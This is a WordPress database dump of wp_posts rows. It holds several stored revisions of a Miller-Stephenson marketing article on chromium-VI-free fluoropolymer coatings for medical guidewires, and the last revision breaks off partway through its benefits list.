INSERT INTO `wp_posts` VALUES (3641, 0, '2017-02-16 19:52:10', '2017-02-16 19:52:10', '', '', '', 'publish', 'closed', 'closed', '', '3641', '', '', '2017-02-16 19:52:10', '2017-02-16 19:52:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3641/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3642, 3, '2017-02-16 19:58:03', '2017-02-16 19:58:03', '<h1><strong>Medical Guidewire Coatings:  Device manufacturers can leverage the thin-film, lubricity, and biocompatibility of Chemours / Miller-Stephenson\'s fluoropolymer coatings to meet the demanding requirements of their  medical devices.</strong></h1>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to delivery the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further question about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-16 19:58:03', '2017-02-16 19:58:03', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3643, 0, '2017-02-16 21:40:10', '2017-02-16 21:40:10', '', '', '', 'publish', 'closed', 'closed', '', '3643', '', '', '2017-02-16 21:40:10', '2017-02-16 21:40:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3643/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3644, 0, '2017-02-16 22:20:01', '2017-02-16 22:20:01', '', '', '', 'publish', 'closed', 'closed', '', '3644', '', '', '2017-02-16 22:20:01', '2017-02-16 22:20:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/3644/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3645, 0, '2017-02-16 23:17:35', '2017-02-16 23:17:35', '', '', '', 'publish', 'closed', 'closed', '', '3645', '', '', '2017-02-16 23:17:35', '2017-02-16 23:17:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/3645/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3646, 0, '2017-02-17 07:30:19', '2017-02-17 07:30:19', '', '', '', 'publish', 'closed', 'closed', '', '3646', '', '', '2017-02-17 07:30:19', '2017-02-17 07:30:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/3646/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3647, 0, '2017-02-17 10:44:37', '2017-02-17 10:44:37', '', '', '', 'publish', 'closed', 'closed', '', '3647', '', '', '2017-02-17 10:44:37', '2017-02-17 10:44:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3647/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3648, 3, '2017-05-17 18:49:41', '2017-05-17 18:49:41', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufacturers understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guidewires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity and biocompatible nature found exclusively with fluoropolymer technology.\n\n&nbsp;\n\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\n\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection of the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately, Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured, all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection. Our medical coatings have never been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\n\nChemours, in conjunction with Miller-Stephenson, have developed state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\n<ul>\n 	<li>Non-acid Primer (Chromium-VI) system</li>\n 	<li>Water and Solvent-based formulations</li>\n 	<li>One-Coat and Two-Coat Systems</li>\n 	<li>High and Low Cure temperatures</li>\n 	<li>Various Colors and Viscosities available</li>\n 	<li>Extremely low coefficient of friction (Tested ASTM 1894)</li>\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\n 	<li>Passes  ISO 11070- Corrosion Resistance Test</li>\n 	<li>Passes ISO 7802- Wire Wrapping Test</li>\n</ul>\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\n\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\n<h3>Technical or Application Support:</h3>\n<ul>\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further questions about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\n 	<li><span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></span></li>\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-autosave-v1', '', '', '2017-05-17 18:49:41', '2017-05-17 18:49:41', '', 3610, 'https://www.miller-stephenson.com/3610-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3649, 3, '2017-02-17 14:30:57', '2017-02-17 14:30:57', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further question about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-17 14:30:57', '2017-02-17 14:30:57', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3650, 3, '2017-02-17 14:33:16', '2017-02-17 14:33:16', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further question about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></span></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-17 14:33:16', '2017-02-17 14:33:16', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3651, 3, '2017-02-17 14:49:22', '2017-02-17 14:49:22', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufactures understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	<li>Various Colors and Viscosities available</li>\r\n 	<li>Low coefficient of friction (&lt;0.2)</li>\r\n 	<li>Pass of ASTM D3359- Adhesion Test</li>\r\n 	<li>Pass of ASTM 1894- Static and Kinetic Coefficient of Friction Test</li>\r\n 	<li>Pass of ISO 11070- Corrosion Resistance Test</li>\r\n 	<li>Pass of ISO 7802- Wire Wrapping Test</li>\r\n</ul>\r\nCustomer evaluations of this new technology from both coaters and end users have been succinct; this next generation coating brings all the performance benefits of our previous acid-primer formulations while alleviating the strict regulatory and toxicity hurdles observed with Cr(VI). With over 40 years of innovation and development in medical coatings, Chemours and Miller-Stephenson have the technical prowess and operational capacity to deliver the highest of quality products and customer service to its medical customers.\r\n\r\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/"><span style="text-decoration: underline;"><strong>For any further questions about our Fluoropolymer Medical Coatings visit our Medical Webpage</strong></span></a></li>\r\n 	<li><span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></span></li>\r\n</ul>', 'Medical Guidewire Coatings: Innovative Fluoropolymer Solutions', '', 'inherit', 'closed', 'closed', '', '3610-revision-v1', '', '', '2017-02-17 14:49:22', '2017-02-17 14:49:22', '', 3610, 'https://www.miller-stephenson.com/3610-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3652, 3, '2017-02-17 14:52:35', '2017-02-17 14:52:35', '<h3><span style="font-size: 115%;"><strong>Medical Guidewire Coatings: </strong></span><span style="font-size: 115%;"><strong>Miller-Stephenson\'s fluoropolymer coatings </strong></span><span style="font-size: 115%;"><strong>leverage unmatched adhesion and superior lubricity to meet the demanding requirements of medical devices.</strong></span></h3>\r\nIn the medical guidewire coatings market, the use of fluoropolymers centers on three key properties: lubricity, biocompatibility and surface adhesion. Failing to deliver on any of these characteristics can have massive performance and liability implications.  Therefore it is critical that device coaters and manufacturers understand that choosing the highest performing and most consistent fluoropolymer coatings is critical criteria to consider. Fluoropolymer resins find utility in a variety of medical applications from endoscopic blades, surgical instruments, cannulae, guide wires, electrosurgical tools, hypotubes, etc. The use of fluoropolymers in medical applications is so extensive that a detailed exploration of the market is beyond the scope of this article. This expansive application portfolio is directly correlated to the unique stability, lubricity, and biocompatible nature found exclusive with fluoropolymer technology.\r\n\r\n&nbsp;\r\n\r\n[caption id="attachment_3615" align="alignleft" width="248"]<img class="wp-image-3615" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_349523072-800x534.jpg" alt="shutterstock_349523072" width="248" height="165" /> G<span style="font-size: 105%;">uide wire traversing a blood vessel</span>[/caption]\r\n\r\nThe focus of this article will lie primarily on the coating of metallic medical wire (ie: catheter guidewire, nitinol wire) and cautery / scalpel tips. Fluoropolymer-coated guidewires are often used in the first step of many minimally invasive medical procedures. Fluoropolymer coatings for guidewires are applied for three primary reasons: Enable smooth wire insertion, lower friction during wire advancement / minimize friction-induced vessel spasms, and protection the core wire from corrosion. Each of these characteristics are critical for successful completion of any medical procedure using guide wire.  From a chemical standpoint these attributes start with the base fluoropolymer and binder system.  Industry precedent relied upon chromium (VI)-based binder systems to provide the surface adhesion of the fluoropolymer to the metallic substrate.  These systems typically would consist of a water or solvent carrier fluid and could be applied via spray, dip, or reel-to-reel operations. Coatings consist of a traditional two-coat system (primer and topcoat) and an efficient, high-throughput one-coat system. Coating thickness is typically 5-10 micron. Strict ISO and ASTM qualifications exist to evaluate the adhesion, flexibility and corrosion-resistance of the applied coatings. Unfortunately Cr(VI) exhibits acute cytotoxicty at low exposure levels and therefore considerable safety precautions must be taken throughout the shipment, storage, application, curing procedures. Once the coating is fully cured all safety concerns associated with Cr(VI) no longer apply and the coated wire or medical device is 100% biocompatible and safe for use. Our acid-primer based medical guidewire coatings are widely known as the "gold standard" in terms of durability, adhesion, and surface lubricity, indicative of our astute attention to perfection, never has our coatings been observed showing any sign of delamination nor in-vivo "slip-stick" issues.\r\n\r\nChemours, in conjunction with Miller-Stephenson, has developed a state-of-the-art, next generation medical guidewire coatings which are chromium-VI free, yet exhibit comparable performance to the acid-primer systems. Removal of Cr(VI) eliminates the need for expensive shipping, storage, and applicator exposure precautions.  These novel coatings are available in solvent and water-based carrier fluids and are formulated for two-coat or one-coat applications.  Traditional coating methodology such as spray, dip, and reel-to-reel are fully compatible with this next generation coating. Moreover because of the advancements made in this technology, Chemours has developed a coating specifically for Nitinol and temperature-sensitive alloys, providing a low-temperature curing profile while maintaining full adhesion and lubricity characteristics. Benefits of this non-Cr(IV) include the following:\r\n<ul>\r\n 	<li>Non-acid Primer (Chromium-VI) system</li>\r\n 	<li>Water and Solvent-based formulations</li>\r\n 	<li>One-Coat and Two-Coat Systems</li>\r\n 	<li>High and Low Cure temperatures</li>\r\n 	